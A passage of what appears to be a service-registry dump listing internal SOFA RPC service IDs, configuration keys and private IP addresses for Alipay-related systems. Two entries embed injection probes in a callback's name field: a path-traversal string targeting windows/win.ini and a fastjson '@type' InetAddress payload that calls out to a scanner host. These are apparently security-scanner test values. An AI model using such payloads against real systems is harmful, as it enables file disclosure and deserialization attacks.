A_ROUTER","com.mybank.bkaccorderprod.service.facade.LightPayFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cloudbox.facade.api.request.RequestUniformCallbackFacade:1.0:cloudlego@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:uemprod@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchdtunical.common.service.facade.DtServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.securitycap.common.service.facade.worktask.facade.PrivacyQuestionManagerService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.acticketcore.kernel.common.service.facade.CompatibilityFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.kbdataanalyser.common.service.facade.DataServiceConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:dpchangeguardian@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.yebplus.common.facade.service.api.baobei.api.query.BBBalanceQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finassistantmng.common.service.facade.api.CardOperateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zdataquery.common.service.facade.hbase.FinSupergwHbaseQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.common.core.client.AppInvokeService:1.0:appxprod@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_CLOUDBOX#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.charge.service.bizfee.facade.ChargeActivityServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.riskmngPunishcenterTairCache_dest.zonePolicy,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_11.124.140.155#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.opscloudcore.common.service.facade.execute.callback.ChangeServiceCheckCallback:1.0:finassistantcore_modular_template@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cloudengine:name=com.alipay.cloudengine.loglevel.customscenter.logLevelConfig,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.aladdin.common.service.facade.SearchNullResultRecordFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mapi.gateway.invoke.webservice.SysExterfaceInvokeService:1.0:gmcore@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.153.53#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.couponcore.common.service.facade.CouponQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.sofa.rpc.elastic.ElasticService:1.0:monitorprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","DATA_ID_30.50.1.113#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.fc.mif.common.service.facade.MerchantShopCzonePageQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.fundprod2:name=com.alipay.fc.paramcore.common.service.domain.manage.facade.ldc.ParamCoreLdcDrm.ldcCZoneOpen,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","config:com.alipay.sofa.rpc.elastic.ElasticService:1.0:riskxm@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","config:com.alipay.bizfundprod.common.service.facade.payment.transferremind.TransferRemindNotifyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:basement-wealthaitwa@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.mosng.MosngAdapterService:1.0:finuserquote@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.arater.common.service.triple.RateWaitAlgoRank:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcloanapply.common.service.facade.service.confirm.ConfirmManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.nodejs.ConsumerService:1.0:yuquedataproxy@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.kmi.common.service.facade.KeyFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.fc.fcbuservice.common.service.facade.manager.AuthManager:1.0:iAuthManager@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcreditbill.facade.installment.api.PcreditBillInstallmentQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbmaterialcenter.common.service.facade.api.MaterialFeatureManageService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.addpInsttradeTairRz.ldcTairWeight,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_30.23.228.29#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.ebppprod.common.service.facade.valueCard.ValueCardFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.itemcore.common.service.facade.v2.ItemConsistentQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcreditchannel.facade.task.service.QueryUserTaskFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:cloudinc@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.tfapi.GroupFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchiswisdom.topology.common.service.facade.api.topology.TopologyOperationFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchportalcore.common.service.facade.transcode.TransCodeFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobileapp.common.service.facade.spi.NegativeScreenCardInvokeRZService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.taskcenter.common.service.facade.callback.Callback:1.0.0:test_service1@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:basement-coffeepay@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.lendpofprod:name=com.alipay.lendpofprod.biz.service.loan.impl.support.drm.LpLoanApplyConfigDrm.grantToBankResultProcess,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_30.32.76.81#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.opscloudcore.framework.core.facade.OpscloudClientServiceFacade:1.0:openaccess@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","openmonitor@msgbrokerMosn#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.unitradeprod.common.facade.service.OrderPreAuthFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.iagreement.service.facade.api.AgreementQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.financemng.common.service.integration.zcbsalescenter.ZcbConfigManageFacadeClient:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.null:name=com.antcloud.ifcidentitycloudus.biz.nac.drm.NacConfigDrmServiceImpl.lisaGw,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.orderservice.common.service.facade.OrderService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.68.113#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.fincoretechdss.ha.DrmPushService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.39.179.136#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_192.168.1.6#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.charge:name=com.alipay.slaguard.common.drm.SlaGuardConfigDrm.faultInOsValue,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mrchportalcore.common.service.activity.facade.gzone.activity.platform.ProjectManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Servers_TP_C_CUSTOMER#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.ap.acquirefront.service.facade.api.standard.AcquireStandardSettleService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.minitrans.service.facade.common.miniconfig.api.MiniconfigQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobileha.biz.antha.ha.AnalysisLegoAlarmManagerService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.nodejs.ConsumerService:1.0:tr-service-disable@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zpublishuiweb:name=com.alipay.zoneclient.internal.DynamicLdcSwitchResource.ldcVipSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.ordermng.common.service.api.merchant.MerchantService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.dpcscgateway.common.service.MpcClient#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.securitycap:name=com.alipay.common.tracer.manage.TracerDrm.enableRpc2JvmDigest,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.iexclienttrdcenter.service.facade.api.TradeAdviceManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.etetestcore.service.api.lendpof.LoanRepayApplyService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.securitycore.common.service.facade.validator.api.SecurityValidateProductService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.23.180.254#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.nodejs.ConsumerService:1.0:chair@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.zoloz.zprod.face.service.facesearch.facade.FaceSearchFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:bkdepmng_dhb_dayAmtLimit@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.25.212#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mrchservbase.common.service.task.external.service.TaskGzServiceFacade:1.0:mrchportalcoreGzFacade@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.acprodapicore.facade.service.ApiRateLimitFacade:1.0:product@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.secucommunity.common.service.facade.qasync.QaDataSyncFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.ordermng:name=com.alipay.cif.model.cache.CifCOControlSwitch.switchCurUserStatus,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.nodejs.ConsumerService:1.0:application@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.lendpofprod:name=com.alipay.lendpofprod.biz.shared.support.drm.LoanRepayConfigDrm.repayDiscountsAvailable,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.fluxrouter.common.service.facade.api.RouterAmountLimitQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.findatacanal.common.service.manage.gildata.CompanyLeaderPositionFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zcache:name=com.alipay.zcache.tbase.yfdwebTBaseCache.cacheEngineUrl,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.zpublishuiweb:name=com.alipay.common.security.dresource.SecurityCommonDrm.uriCheckDeny,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.custview.antg.facade.idmap.AntCustIdMapViewGzoneQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","HEALTHY_V2@pcreditbenefit#@#DEFAULT_INSTANCE_ID#@#SOFA-HEALTHY","com.alipay.fc.operator.common.service.facade.mng.TenantFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kabaoprod.service.facade.spi.DiscountInfoQueryFacade:1.0:mobilecsa@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows/win.ini@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openeval.common.service.facade.eval.QueryRankSearchResourcesService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.etetestcore.service.api.YebOpenAccountService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA-SCHEDULER-S-S-kbservcenter-task#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.socialcore.facade.task.ShopInfoFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cfmng:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.ioErrorIntervalSeconds,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mitemcenter.common.service.facade.api.sidedish.SideDishGroupQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_S_REFUND#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.qianli.common.service.neardata.facade.QianLiInvokeAppTrFacade:1.0:antforest@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.findefencecore.common.service.script.api.ScriptInputFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zqueue.server.sigma-job-5fe07fbfd8ce5803a4a182cf-random-m46hs-25mz9.qaZQueue10#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","DATA_ID_100.69.213.60#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.meshycommander.common.service.facade.MeshMapConsultService:1.0:meshMapConsultService@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mservice.common.service.facade.api.gateway.GatewayFacade:1.0:openmonitor_onestop_lifemockService@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finfocore.common.service.facade.fop.api.mng.ShopFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.alhub.facade.event.DriveConcernFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cloud.apfasmng.common.service.facade.appservice.ServerlessAppServiceFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.etetestcore.service.api.finpwm.FinpwmCapitalPlanQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.nodejs.ConsumerService:1.0:yebpromobff@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insxhbprod.common.service.facade.PeriodFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.promocenter:name=com.alipay.promocenter.common.drm.PromocenterBussinessParamsDrmResource.periodControlUseTimesRule,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mrchiscore.settling.common.service.facade.SettlingWriteFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:{\"@type\": \"java.net.InetAddress\",\"val\":\"33024869-uniqueId-121001002.antscanner.global.alipay.com\"}@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ccr.facade.CreditCardInfoFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.koubei.kbbocenter.common.service.facade.order.BatchTaskManagerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.finpwm.biz.starwish.drm.impl.StarWishDrmImpl.flyPageShowModel,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fundmng.common.service.integration.filefactory.FileFactoryClient:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.gateway.adapterservice.MobileAdapterService:1.0:imobileprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.supergwlite.service.facade.spi.MessageReceiveService:1.0:fluxnet@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbcheck.common.service.facade.api.BatchTaskQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opencore.service.facade.InterfaceManageFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zdataservice.common.service.facade.BizOrderBatchQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.instasset.ucm.core.InstQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fcratecenter.service.facade.api.FcQuoteCodeMngFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.scardcenter.common.service.facade.OfflinepayTransportWidgetServiceRzoneFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.trsbrain.common.service.facade.service.CheckAlarmSelfCureFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.inspectprod.biz.service.schudeler.SyncArchInfoService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.gfinvest.facade.api.shareholder.CustShareholderFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.imerchprod.merchant.facade.api.StoreQueryService:1.0:imif@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fundboss.common.service.facade.singleha.HAMetadataManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.logrotator-app-hour-custom_hourdelimiter:name=com.alipay.sla.businessgray.drm.BusinessGrayGlobalSwitcher.globalTimeout,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.pcreditinstallprod.common.service.jfq.JfqCardAgreementOperateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilechat.biz.game.rpc.api.ChatGameRpcService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.jiuzhou.client.spi.PaasActionDispatcher:1.0:schedulerweb@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mappprod.common.service.facade.data.AnnualRetrospectiveFacade:1.0:mappprod-merchantapp@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.statusbar.common.service.sync.StatusbarCommonSyncFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finloancore.p2p.service.facade.raise.api.P2pRaiseManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cifin:name=com.alipay.cif.client.drm.TairToTbaseSwitch.fullAccessToTbase,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.publiccore.common.service.facade.cicada.PublicCicadaFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.agap.service.facade.api.ModelDispatchService:1.0:gwService@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.promobench.common.service.facade.service.PromobenchTemplateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.lifeprod.common.service.facade.api.promotion.LifePromotionLinkOperateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.securitydata.common.service.facade.QueryRuleService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.intimateprod.common.service.facade.spi.IntimateBenefitCallbackService:1.0:anteduprod_trial_send_prize@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.intclcn.common.service.facade.IntRateQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.invoicecommercial.facade.api.ActiveFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.secdatacontext.common.facade.api.manage.DataSchemaVOMngService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","SOFA_PRC_TRANSMIT_PCSMARTDECISION#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mcenter.common.service.facade.McenterMoveUserFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_S_OPS_*#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","DATA_ID_30.50.78.36#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.hainaprod.common.service.facade.api.mini.market.UniMarketDeliverAdminFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.messagefusion.inner.facade.api.MsgBoxConfigInnerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.mybank.bkmerchantsettle.common.service.facade.vostro.api.VostroDetailQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finfocore:name=com.alipay.fc.fluxconf.fluxconfClient.drm.CtrlDataResource.dumpLogTables,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.Arch:name=com.alipay.cif.client.drm.ClientLogControlDrmSwitch.insttrade.logControlDrmSwitch,version=1.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.paycore.platform.schedule.concurrent.load.DataLoadDriver:1.0:psslipDataLoadDriver@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.taskcenter.common.service.facade.callback.ProcessTaskCallback:1.0:cstask_identityReleaseProcessTaskCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.promocenter:name=com.alipay.promocenter.common.drm.PromocenterBussinessParamsDrmResource.deliverToAlipayCommonGrayPercentage,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","config:com.alipay.socplt.common.service.facade.DyDataService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","Alipay.finpwm:name=com.alipay.common.security.dresource.SecurityCommonDrm.paramCheckConfig,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fraudmng.common.service.facade.securityprodmng.SecuritySceneConfigQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:uemprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.alphad.common.service.facade.importer.api.IDataImporterFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.permlimit:name=com.alipay.revol.drm.RepoConfig.remoteCacheTenantCodes,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","NS_Sub_Servers_TP_S_1255#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.antinvoice.biz.flow.status.StatusManager:1.0:statusManager@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.sofa.rpc.elastic.ElasticService:1.0:oasisdatamanager@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.prodcoreTairCache.compressionThreshold,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.csaccurate.service.facade.mng.api.RuleSetService:1.0:rmaccurateService@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.secucommunity.biz.service.hotevent.index.HotEventIndexManager:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.processmng:name=com.alipay.antvip.client.internal.drm.DrmControl.printStatInfoIntervalSec,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.superapi.common.core.client.AppInvokeService:1.0:antlaw@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.astaralarm.common.service.facade.DrillHistoryManagerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.revcore:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.responseExceptionIntervalSeconds,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.clivemng.common.service.facade.api.plan.SchedulePlanUserQueryService:1.0.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.atd:name=com.alipay.common.security.util.dresource.SecurityCommonUtilDrm.paramCheckDeny,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mdatasync.common.service.facade.DacServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.etetestcore.service.api.yebplus.YebPlusContractService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ordermng.common.service.api.order.OrderExtInfoService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.opencore.service.facade.gateway.GatewayAppFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.cscheck.service.facade.api.QcRecordSynchronizeFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.96.219#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.publiccore.common.service.facade.advert.PublicAdmgrFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.baitiaoprod.common.service.facade.query.BillRepayPlanQuery:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbsales.common.service.facade.bcm.BPProcessCallbackFacade:1.0:setOrderStatusExceptionHandle@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cfpcenter:name=com.alipay.cif.model.cache.CifCOControlSwitch.writeCustProp,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.koubei.kbbusinessprod.common.service.facade.api.FinanceInfoQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.workflow.common.service.facade.api.tsd.TsdAbilityFacade:1.0:workflow_tsd_faultdiagnosisability@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.huanyu.biz.apibus.facade.drm.ip.DrmSetValueByJmxZoneFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.settlequery.common.service.facade.withdraw.api.OnlineWithdrawBatchQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_S_PRESUBMIT#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","DATA_ID_100.83.242.136#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.superapi.client.SystemAppInvokeService:1.0:finresprod@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Servers_TP_O_MDEVSUPPORT#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.aldingprod.common.service.facade.api.DpLegalSuggestionFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antthoth.service.facade.BizSceneGroupFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.socialcore.facade.c2c.skill.UserSkillFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finpromoscene.common.service.facade.api.wdsp.adx.WdspAdxServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cryptprod.common.service.client.api.SignatureClient:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.emccenter.common.service.facade.api.BemcTaskManageFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finance.filefactory.sevice.FilePlatformParseReceiver:1.0:instdispute@DEFAUL